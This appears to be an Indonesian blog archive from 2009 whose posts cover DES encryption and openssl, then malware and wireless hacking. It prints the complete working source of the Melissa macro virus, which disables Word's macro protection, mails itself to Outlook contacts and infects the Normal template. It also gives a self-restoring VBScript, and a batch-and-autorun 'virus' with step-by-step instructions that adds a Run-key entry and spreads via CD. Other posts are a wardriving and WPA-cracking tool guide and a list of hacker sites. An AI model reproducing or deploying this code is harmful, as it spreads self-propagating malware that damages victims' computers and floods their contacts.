Selasa, 07 April 2009

Enkripsi dan dekripsi

Enkripsi adalah ukuran security yang pertama, tetapi banyak wireless access points (AP) tidak menggunakan enkripsi sebagai default-nya. Meskipun banyak AP telah memiliki Wired Equivalent Privacy (WEP) protocol, tetapi secara default tidak diaktifkan. WEP memang mempunyai beberapa lubang di security-nya, dan seorang peretas yang berpengalaman pasti dapat membukanya, tetapi itu masih tetap lebih baik dari pada tidak ada enkripsi sama sekali. Pastikan untuk mengaktifkan metode WEP authentication dengan “shared key” daripada “open system”. Untuk “open system”, AP tidak melakukan enkripsi data, tetapi hanya melakukan otentifikasi client. Ubah WEP key sesering mungkin, dan pakai 128-bit WEP hindari menggunakan 40-bit.


Mengenal Algoritma DES

Semenjak kehadiran internet pada kehidupan manusia, kontrol atas informasi bergerak dengan amat cepat.Termasuk pula informasi-informasi yang harus mendapatkan “perhatian” khusus karena nilai informasi tersebut yang sangat penting semisal informasi intelijen,militer, dan berbagai macam informasi yang sering dilabeli
TOP SECRET.

Dengan adanya masalah di atas maka muncul ilmu baru pada dunia informatika yang disebut kriptografi yang merupakan pengembangan dari kriptologi.Berbagai pakar kriptografi telah mengembangkan berbagai macam algoritma enkripsi seperti AES,Lucifer,OTP,IDEA,Triple DES,DES,dsb.Diantara berbagai macam jenis algoritma, DES merupakan algoritma yang paling terkenal dan paling banyak digunakan di internet semisal untuk aplikasi e-commerce,perbankan,dll.Namun sebelum mempelajari bagaimana cara kerja algoritma DES maka akan “sedikit” dibahas terlebih dahulu riwayat hidup sang algoritma.

Kisah Hidup DES (Data Encryption Standard)

Pada sekitar akhir tahun 1960, IBM melakukan riset pada bidang kriptografi yang pada akhirnya disebut Lucifer.Lucifer dijual pada tahun 1971 pada sebuah perusahaan di london.Lucifer merupakan algoritma berjenis Block Cipher yang artinya bahwa input maupun output dari algoritma tersebut merupakan 1 blok yang terdiri dari banyak bit seperti 64 bit atau 128 bit.Lucifer beroperasi pada blok input 64 bit dan menggunakan key sepanjang 128 bit.

Lama kelamaan Lucifer semakin dikembangkan agar bisa lebih kebal terhadap
serangan analisis cypher tetapi panjang kuncinya dikurangi menjadi 56 bit dengan maksud supaya dapat masuk pada satu chip. Di tempat yang lain, biro standar amerika sedang mencari-cari sebuah algoritma enkripsi untuk dijadikan sebagai standar nasional.IBM mencoba mendaftarkan algoritmanya dan di tahun 1977 algoritma tersebut dijadikan sebagai DES (Data Encryption Standard).

Ternyata timbul masalah setelah DES resmi dijadikan algoritma standar
nasional.Masalah pertama adalah panjang kunci DES yang hanya 56-bit sehingga amat sangat rawan dan riskan serta berbahaya , terhadap brute-force attack.Masalah kedua adalah struktur DES pada bagian substitution-box (S-box) yang diubah menurut saran dari NSA.Desain substitution-box dirahasiakan oleh NSA sehingga kita tidak mengetahui kemungkinan adanya kelemahan-kelemahan pada DES yang sengaja disembunyikan oleh NSA.Dan juga muncul kecurigaan bahwa NSA mampu membongkar cypher tanpa harus memiliki key-nya karena menurut para “pakar” kriptografi, DES sudah didesain secara cermat sehingga kalau S-box ini diubah secara acak maka sangat mungkin DES justru lebih mudah “dijebol” meskipun DES cukup kebal terhadap serangan differential cryptanalysis maupun linier cryptanalysis.

Seperti kata peribahasa “Karena susu setitik rusak iman sebelanga” ,.Di dunia ini tak ada ciptaan manusia yang sempurna.Pada tahun 1998, 70 ribu komputer di internet berhasil menjebol satu kunci DES dengan waktu
sekitar 96 hari.Bahkan pada tahun 1999 berhasil dibobol dalam waktu kurang dari 22 hari.Pada tanggal 16 juni 1998 ada sebuah kelompok yang menamakan dirinya Electronic Frontier Foundation (EFF) telah berhasil memecahkan DES dalam waktu 4-5 hari menggunakan komputer yang dilengkapi dengan Integrated Circuit Chip DES Cracker.Di akhir tragedi ini, DES dianggap sudah tak aman lagi sehingga ia dicampakkan begitu saja dan digantikan oleh AES (Anvanced Encryption Standard).


Plaintet sebesar 64-bit akan dipecah menjadi 2 bagian yaitu Left (L) dan
Right.Bit-bit dari plaintext akan mengalami permutasi sehingga susunannya akan
berubah sebagai berikut :

Maksud daripada keterangan di atas adalah, bit yang pada plaintext terletak pada urutan ke 58, setelah di Inisial permutasi posisinya berubah yang tadinya berada di urutan ke 58 menjadi urutan ke-1 atau yang pertama.Jika diperhatikan, bit-bit bernomor genap setelah dipecah berada di blok L (kiri) dan bit yang bernomor ganjil terletak di blok R (kanan).Permutasi diatas menggunakan sebuah urutan yang ditunjukkan oleh arah panah berwarna merah.Dimulai pada kolom paling kanan dan bit-bit yang ada akan bergerak secara urut dengan vertikal ke arah bawah.Sebagai contoh pada blok L, bilangan genap asli terkecil adalah 2 sehingga dimulai dengan angka 2 lalu 4,6,8 lalu menuju kolom di sebelah kirinya 10,12,dst.

16 Ronde pada DES

Algoritma DES mengalami 16 ronde untuk membentuk sebuah cipher.Pada setiap ronde, blok R (kanan) tidak akan mengalami perubahan apapun karena hanya akan dipindah menjadi blok L pada ronde selanjutnya.Namun blok R akan digunakan bersamaan dengan subkey 56-bit untuk diolah pada fungsi F dan akan di XOR-kan dengan blok L (kiri).Jika bingung dengan penjelasan di atas, coba perhatikan dan amati skema pada masing-masing ronde DES di halaman selanjutnya



Nah, semoga kamu sudah paham setelah melihat penjelasan, bagan, dan persamaan yang telah dijelaskan di atas tadi.Fungsi F merupakan satu-satunya fungsi linier yang nilainya berubah-ubah tergantung pada nilai Blok R (kanan) dan sub-key 56-bit.Saya yakin kalau kamu sudah bertanya-tanya tentang fungsi F.Sekarang, untuk kesekian kalinya, perhatikan lagi sebuah bagan di halaman selanjutnya (soalnya tempatnya nanggung banget nih)


[32 1 2 3 4 5 4 5 6 7 8 9
8 9 10 11 12 13 12 13 14 15 16 17
16 17 18 19 20 21 20 21 22 23 24 25
24 25 26 27 28 29 28 29 30 31 32 1]

Angka-angka yang dicetak tebal merupakan bit-bit yang akan ditambahkan pada input sebesar 32 bit agar menjadi 48 bit.Angka tersebut akan muncul 2 kali seperti angka 1,4,5, dst.Bilangan yang dicetak tebal juga bertambah dengan aturan (a,a+8,a+16,a+24 dengan a sebagai bilangan minimum pada satu kolom) secara vertikal.Jika angka yang dicetak tebal dihilangkan maka akan muncul bit-bit yang berurutan.Jadi bit pertama yang akan di-outputkan oleh blok ekspansi adalah bit ke 32 pada input ekspansi.

Hasil dari output ekspansi akan di XOR dengan subkey yang telah mengalami penghapusan byte terakhir (1 byte=8 bit) yang diubah ukurannya dari 56 bit menjadi 48 bit.Hasil XOR tadi adalah sebuah bilangan 48 bit yang akan dibagi secara merata kepada 8 Substitution Box sehingga masing-masing box akan di-input sebesar 6 bit (48/8=6).Substitution box yang agak gamblang dapat dilihat pada gambar di bawah ini :



dari 6 bit input pada S-box, bit paling kiri akan dimasukkan pada CL (Control Left) dan bit paling kanan akan dimasukkan pada CR (Control Right) sedangkan 4 bit sisanya akan dianggap sebagai input yang biasa-biasa saja ,.
Output dari masing-masing S-box akan menjadi bilangan sepanjang 4 bit sehingga output total dari 8 S-box menjadi 32 bit (4*8=32).Lantas, bagaimana pengolahan input pada masing-masing S-box ? OK, saya akan memberikan salah satu contoh yaitu pada S-box yang pertama.Amati tabel di bawah ini :

Contoh :
input pada S-box ke adalah 110010.Berapa nilai outputnya ?
Jawab:
Bit paling kiri akan dijadikan CL dan bit paling kanan akan dijadikan CR.
110010
CL=1
CR=0


Pertemuan antara baris dan kolom di atas merupakan output dari s-box pertama
yang kemudian harus diubah dalam bentuk biner.

12(10) = 1100(2)

Jadi jika input dari s-box pertama adalah 110010 maka outputnya bernilai 1100.
Jika seluruh input pada S-box telah didapatkan hasil yang panjangnya 32 bit
maka hasil tersebut akan dipermutasi dengan aturan :

[16 7 20 21 29 12 28 17
1 15 23 26 5 18 31 10
2 8 24 14 32 27 3 9
19 13 30 6 22 11 4 25]

Jadi, jika input dari blok permutasi pada bit ke 16 akan berubah menjadi bit pertama dari output blok permutasi.

Menggunakan Algoritma DES pada aplikasi openssl

Openssl merupakan toolkit kriptografi yang merupakan inplementasi dari secure socket layer (SSL) sebagaimana pada manual pages-nya OpenSSL is a cryptography toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) network protocols and related cryptography standards required by them.

Openssl masih berupa tool command line yang bisa digunakan untuk mengenkrip pesan dengan algoritma simetris maupun dengan fungsi hash satu arah.Di sini saya mencoba menjelaskan bagaimana menggunakan openssl untuk mengenkrip plaintext menggunakan algoritma DES.Openssl yang digunakan merupakan OpenSSL 0.9.7e yang dirilis tanggal 25 oktober 2004 pada distro mandriva 2005.
Sebagai contoh saya akan membuat sebuah plaintext untuk dienkrip menggunakan openssl.Misalnya text tersebut berisi :

Plaintext tersebut disave dengan nama plaintext.php di direktori home.
$ ls
plaintext.php
kemudian saya enkrip menggunakan openssl.
$ openssl enc -e -des -in plaintext.php -out ciphertext.php
maka akan ada perintah untuk memasukkan key.Sebagai contoh key yang saya gunakan adalah hacker.Dan akan ada konfirmasi yang kedua untuk melakukan pengecekan.
enter des-cbc encryption password:
Verifying - enter des-cbc encryption password:
maka akan muncul sebuah file baru bernama ciphertext.php
$ ls
plaintext.php
ciphertext.php
isi dari ciphertext.php dapat dilihat menggunakan text editor.
Salted__¢$Χ#ú8#YÑÏP³#{,ä¯#ç^iS#0Ò

Lalu untuk mendekripsinya dapat digunakan perintah
$ openssl enc -d -des -in ciphertext.php -out plaintext2.php Maka akan ada konfirmasi key.Anda hanya perlu memasukkan satu kali tanpa verifikasi.jika key yang dimasukkan salah maka akan muncul pesan error sbb :
bad decrypt
32416:error:06065064:digital envelope routines:EVP_DecryptFinal:bad
decrypt:evp_enc.c:450:
Jika key-yang dimasukkan benar maka akan muncul file beru bernama plaintext2.php yang isinya sama dengan plaintext.php.
Mengenai openssl anda dapat mempelajarinya sendiri lewat man pages-nya atau dari howtos-howtos yang ada di internet karena saya tidak bisa membahas secara rinci di sini.Openssl juga mendukung algoritma-algoritma lain seperti blowfish, AES, IDEA, rc2, rc4, rc5 dan juga fungsi hash seperti md5 dan sha1.



Penutup
Algoritma DES dalam melakukan proses enkripsi dan dekripsi menggunakan teknik yang disebut feistel yang muncul ketika awal tahun 70-an.Fungsi pada feistel dijamin dapat didekripsi:
Li �� f(Ri , Ki+1) �� f(Ri , Ki+1) = Li
Fungsi di atas dijamin dapat didekripsi selama input f dalam setiap tahap dapat dikembalikan juga.Tidak perduli macam f (meskipun fungsi f tidak dapat dibalik sekalipun) kita dapat mendesain serumit apapun tanpa perlu susah-susah untuk membuat 2 algoritma untuk enkripsi dan dekripsi.Teknik ini digunakan pada banyak algoritma seperti DES, Lucifer, FEAL, Blowfish, dll. Seperti sudah disampaikan di awal bahwa panjang kunci DES yang hanya 56 bit sangat rawan di brute force sehingga saat ini digunakan 3 buah DES secara berurutan untuk mengenkripsi sebuah paintext yang disebut Triple DES.Panjang kunci Triple DES juga diperpanjang 3 kali menjadi 168 bit (56*3 = 168).


Source :
1. Stalling, William. Crypthography and Network Security. Prentice-hall, 2003
2. Kurniawan, Yusuf. Kriptografi Keamanan Internet dan Jaringan Komunikasi.
Penerbit Informatika, 2004
3. Ariyus, Doni. Kamus Hacker. Penerbit Andi, 2005
4. Anonim. Memahami model enkripsi dan Security Data. Penerbit Andi, 2003
5. Stiawan, Deris. Sistem Keamanan Komputer. Elex Media Komputindo, 2005
For Evaluation Only.



SUMBER : http://images.rahmanmillenium.multiply.com

Rabu, 01 April 2009

source code virus Mellisa

Disini kita membedah source code virus melisa, semoga kita bisa belajar dari sini agar nantinya kita bisa mengerti dan mampu belajar.
Serta dapat menambah pengetahuan kita dalam mempelajari virus.
dibawah ini kita mempelajari source code virus Mellisa.

Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub


Sumber : http://www.klik-kanan.com

Semoga tulisan ini bermanfaat, dan sebagai bahan belajar, bukan sebagi cara membuat orang lain dirugikan.

Cara kerja virus

Virus komputer berisi kode-kode bahasa pemrograman yang memiliki kemampuan untuk merusak file atau merusak sistem komputer. Virus komputer juga mempunyai kemampuan untuk memperbanyak dirinya sendiri dan punya kemampuan membangun dirinya sendiri jika file virus di delete atau dihapus juga bisa mencari jenis file tertentu yang akan di infeksi. Virus juga sering menampilkan pesan-pesan yang sangat mengganggu, mendelete file, nengganti nama file bahkan memformat hardisk.

Contoh virus : Virus Die hard, Virus I LOVE YOU, Virus CIH dll

Virus dapat dibagi dalam beberapa jenis :

1. Macro Virus: Virus yang sering menginfeksi file-file dokumen seperti file MS Exel, MS Word
2. Boot Virus: Virus yang berada di boot sector.
3. File Virus: Virus yang menginfeksi file program seperti file exe.
4. Multipartite Virus: Virus yang menginfeksi baik boot sector dan file.

Seperti penjelasan di atas, virus mempunyai sifat bisa membuat dirinya sendiri jika di delete. Mengapa ? Karena virus mempunyai kode program yang sering disebut fungsi anti deletion. Kode program ini akan membuat file lagi jika di delete. Kodenya sebenarnya sangat sederhana. Contoh script atau kode programnya adalah sbb:


Set fso = createobject("scripting.filesystemobject")

Set aku = fso.opentextfile(wscript.scriptfullname)

tulis = aku.readall

aku.close

Do

on error resume next

if not(fso.fileexists(wscript.scriptfullname)) then

set dia= fso.createtextfile(wscript.scriptfullname)

dia.write tulis

dia.close

end if

loop


Kalau mau membuktikanya, copy kode diatas, buka program notepad nya windows, dan paste. Kemudian safe file dengan nama terserah tapi dengan extensinya harus vbs. Contohnya antidel.vbs atau coba.vbs. Setelah filenya di save, tutup notepad dan klik 2x filenya. Coba didelete, berapa kalipun kita delet file akan terbentuk kembali.

Cara menghapus filenya gimana?? Gampang, tekan ctrl+alt+del hingga muncul Windows Task Manager, pilih tab prosesses , klik WScript.exe lalu klik End Process dan tutup Windows Task Manager. Sekarang coba kita delete file vbs nya, pasti akan terhapus.

Penjelasan sederhana kode diatas kira2 adalah sbb : file vbs saat di jalankan akan membaca nama file dan seluruh isi file dan akan disimpan di memori komputer sambil selalu memeriksa apakah file vbsnya masih ada atau tidak. Jika filenya sudah di delete program dimemori komputer akan mengcopykan kode dimemori untuk membentuk file yang baru dengan nama dan isi yang sama. Ya, kayak kita copy paste gitulah. Kok gitu ya, emang gitu dari sononya .

Sumber : http://my.opera.com/roismahmud/blog/mengintip-sedikit-cara-kerja-virus-komputer

Membuat virus dari notepad

ni virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! Very Happy Very Happy tapi yg penting gak ke-detect ama anti virus(setahu saya….. Question Question )

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri… Cool Cool

note: Idea “HANYA BEKERJA PADA WINDOWS XP” Idea

caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… Laughing ) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya


Sumber dari http://forum.ituin.org/archive/index.php/t-268.html

note:
- Ini hanya sebagai acara untuk belajar jadi boleh dipraktekan dikomputer sendiri - sendiri'
- Mohon maaf atas segala hal yang diajarkan di posting ini, Jika merugikan orang lain.


Minggu, 22 Maret 2009

Hacking Wireless

Dengan kemudahan mengakses internet melalui wireless, banyak pengguna laptop selalu mencari atau memanfaatkan hotspot yang ada untuk selalu aktif. Ada yang hanya sekedar buka email, ada yang cuman sekedar browsing, bahkan, ada juga yang sampai mengirim tugas kantor. Para pemilk dan pengguna hotspot tidak menyadari bahwa mungkin, diantara mereka ada yang berniat jahat. Untuk kasus sederhana, sebuah hotspot umum palsu dapat menjebak para pemakainya untuk memberikan username dan password mereka tanpa mereka sadari bahwa mereka telah memberikannya. dalam artikel ini, akan saya jelaskan beberapa trik yang digunakan oleh beberapa orang yang berniat jelek dalam memakai wireless. Untuk masalah pencegahannya, bisa dilihat di artikel lain di website ini yang memberikan solusi dan pencegahannya.

Untuk melakukan wireless hacking, langkah pertama yang dilakukan adalah mencari wireless network yang terdekat dengan anda. Hal itu bisa dilakukan dengan wardrive (jika dilakukan diluar ruangan) atau berkeliling mengitari hotspot yang ada (jika di dalam ruangan). Dalam artikel ini, penulis mencoba menguraikan cara menggunakan wardrive karena lebih aman dan mengingat kita hanya mencoba untuk mengetahui jaringan wireless mana saja yang lemah.

Wardrive

Wardrive adalah ekspedisi memancing elektronik untuk mencari jaringan wireless yang lemah di sekitar anda. Kebanyakan, sebagian besar dari jaringan wireless tersebut bahkan tidak diberi password atau enkripsi untuk melindunginya.
Kegiatan ini dilakukan untuk mencari jaringan mana saja yang akan dijadikan obyek serangan. Sehingga, kita bisa melakukan serangan terhadap jaringan wireless yang telah kita jadikan target. Untuk melakukan kegitan ini, diperlukan peralatan sederhana untuk memulainya.

Daftar peralatan yang dibutuhkan:
• GPS receiver
jika daerah anda sudah memiliki GPS, anda dapat dengan mudah menandai daerah mana saja yang sudah anda jelajahi dan memberi tanda khusus dimana dalam daerah yang sudah anda jelajahi tersebut terdapat jaringan wireless yang lemah.

• Wireless PCMI card
Peralatan ini dibutuhkan untuk memperluas jaringan wireless anda. Biasanya, peralatan ini dilengkapi dengan jack untuk wireless antenna receiver atau mensupport jaringan selular untuk memperoleh jaringan yang lebih luas.

• Wireless antenna receiver
Peralatan ini dibutuhkan untuk menambah jangkauan wireless PCMI card yang anda punya dengan menghubungkan jack yang dimilikinya ke dalam wireless card anda. Jika wireless card yang anda miliki tidak mempunyai jack, anda bisa membeli wireless antenna yang memakai port usb yang sudah banyak beredar di pasaran. Tapi, jika anda merasa tidak puas dengan kemampuan memperoleh jaringan menggunakan peralatan yang anda miliki, anda bisa membikinnya dengan murah dengan mengikuti petunjuk yang ada di dalam website dibawah ini :
http://www.instructables.com/id/EQARE4I72GEPUCHTHU/

Pencarian Wireless Network

Kebanyakan jaringan wireless yang beredar tidak mempunyai sekuriti atau enkripsi yang melindunginya. Untuk melacaknya, dibutuhkan peralatan yang mendukung. Ada dua tools yang biasanya dipakai untuk tujuan ini.

• Network Stumbler atau lebih dikenal NetStumbler
Software berbasis windows ini sangat mudah mencari sinyal wireless yang dipancarkan dari hotspot ke pengguna. Penulis banyak menjumpai para pengguna wireless memakai software ini untuk mencari lokasi yang tepat untuk mendapat sinyal wireless dari hotspot yang kuat atau mensurvei apakah hotspot di daerahnya cukup bagus atau tidak.

• Kismet
Salah satu fungsi yang hilang dari NetStumbler adalah kemampuan untuk menampilkan SSID dari hotspot. pada access point, mereka selalu rutin membroadcast info ini. cuman, info tersebut kebanyakan berisi SSID yang tidak terbaca atau terenkripsi. Program ini akan mencari dan menampilkan SSID yang tidak di broadcast oleh hotspot dan sangat penting untuk mencari jaringan wireless yang akan diuji.

Memasuki jaringan wireless yang telah ditemukan

Setelah menemukan sebuah jaringan network, langkah selanjutnya adalah mencoba untuk menghubungkan anda ke jaringan tersebut. Jika jaringan tersebut tidak menggunakan sekuriti enkripsi, anda bisa langsung mengakses ke SSID. Jika SSID tidak di broadcast, anda dapat masuk dengan SSID yang sedang tidak di broadcast. Tentu saja, anda dapat dengan mudah menemukan yang tidak di broadcast menggunakan fitur yang ada kismet bukan? Jika jaringan tersebut dienkripsi, anda membutuhkan salah satu dari peralatan dibawah ini.

• CowPatty
Software ini menggunakan metode brute force untuk membuka WPA-PSK, yang mana PSK sendiri dianggap sebagai WEP baru unrtuk keamanan sekuriti wireless di rumah.Progam ini mencoba beberapa dari berbagai pilihan yang berasal dari file dictionary apakah ada yang sesuai dengan apa yang digunakan sebagai kunci tersebut

• ASLeap
jika ada jaringan yang menggunakan LEAP, alat ini bisa digunakan untuk mencari data semacam username dan password yang sedang online di jaringan, dan mengoverride akses pemiliknya.LEAP tidak memproteksi proses tersebut seperti EAP, yang mana itu menjadi kelemahan utama bagi LEAP.

Mengendus atau mencuri Data Wireless

Tidak peduli apakah anda terkoneksi langsung ke jaringan wireless atau tidak,, jika ada jaringan wireless di dalam daerah dekat anda, selalu ada data yang lewat di dalam jaringan kapan pun itu. Untuk mengambil data itu, anda perlu peralatan untuk mengambil atau melihat data tersebut.

• Wireshark (pendahulu Ethereal)
dimana masih terjadi perdebatan bagaimana cara ynag tercepat dalam menyikapi program ini, tidak ada keraguan lagi bahwa software ini sangat berguna. ia dapat mencari jaringan wireless yang ada lengkap dengan info sekuriti. software ini dapat mecuri data dari 802.11 manajemen hotspot dan bisa juga digunakan sebagai alat untuk mencari hotspot yang tidak memproteksi dirinya dengan SSID.

• SwitchSniffer
Software ini adalah program yang bisa mencari user yang aktif di jaringan switch LAN dan dapat mengambil seluruh packet data tanpa persetujuan user yang bersangkutan, software ini juga dapat mendeteksi program arpspoofer sedang berjalan dan membokir sesi pertahanan semacam firewal. jika anda menggabungkan program ini dengan program sniffer yang lain, anda dapat melihat dan mengambil id user dan password dari user lain di dalam jaringan anda.

Tindakan anda selanjutnya?

Setelah anda mengetahui bagaimana proses hacking, terserah anda mau diapakan data ataupun hotspot yang telah anda temukan dan anda eksploitasi itu. jika anda mau melaporkan ke admin hotspot bahwa ada kelemahan, anda telah menjadi bagian dari Ethical hacker. tapi, jika anda malah makin mengeksploitasi hotspot tersebut, maka anda menjadi Blackcap Hacker. anda mau memilih menjadi apa, itu hak anda. penulis hanya membagi info saja. semoga tutorial ini bermanfaat bagi anda.

Sumber:
- hack proofing your network
- hacking wireless network for dummies
- http://www.ethicalhacker.net/content/view/16/24/

Kamis, 19 Maret 2009

situs - situs hacker

Di media & stereotype masyarakat tentang hacker adalah orang yang jahat dan suka merusak. Padahal arti sebetulnya hacker adalah tidak seperti yang dibayangkan banyak orang. Stereotype ABG 15 tahun, yang duduk di belakang komputer berjam-jam, masuk ke sistem dan men-delete atau menghancurkan apa saja yang bisa mereka hancurkan – "anak" ini dikenal sebagai cracker bukan sebagai hacker. Cracker ini yang sering anda dengar di berita / media, mematikan situs web, menghapus data dan membuat kekacauan kemanapun mereka pergi.

Disini saya menyebutkan berbagai situs2 yang biasa digunakan oleh para blogger dalam menjalakan aksinya.
situs saya tulis ini tidak lengkap secara keseluruhan karena smakin lama situs2 yang digunakan oleh para hacker makin berkembang dan semakin banyak jumlahnya.
diantara situs2 itu adalah yang saya sebutkan disini:
  • http://neworder.box.sk
  • Pada gambar tampak halaman muka situs http://neworder.box.sk yang tampak cukup seram dengan latar belakang warna hitam. Nampaknya warna hitam menjadi favorit banyak situs hacker yang berkesan seram & misterius. Menu paling atas adalh “links” yang merupakan link ke berbagai topik utama yang menarik banyak hacker yang mencari topik yang sangat spesifik, seperti, eksploit Windows95/98/NT, e-zine underground, eksploit UNIX dsb.
  • http://www.k-elektronik.box.org
  • http://www.hackerlink.or.id
  • http://www.binushacker.net
inilah beberapa situs yang dapat digunakan untuk hacking silakan mencoba

Selasa, 17 Maret 2009

hacker

kita flashback dulu kebelakang sebelum membahas tentang hacker. sejak kita menyerahkan data penting kita kepada alat yang bernama komputer, kita tentu akan mengalami banyak kemudahan dalam menyimpan data2 kita. tapi disamping kemudahan yang kita dapatkan terdapat juga resiko yang akan sangat mengancam data2 penting kita. terutama dari serangan virus dan juga dari hacker yang lagi ngetrend beberapa tahun belakangan ini .
Dalam hacker kali ini kita membahas apa saja tool yang digunakan oleh seorang hacker dalammenjalankan aksinya ? sehingga kita dapat belajar menjadi seorang hacker !!!!!!!!!!
tool yang ada disini tidak memuat semua tool yang ada. karena semakin hari, bahkan tiap menit tool2 yang digunakanpun semakin berkembang. tool2 dibawah ini merupakan tool yang sering digunakan oleh para hacker.


Telnet

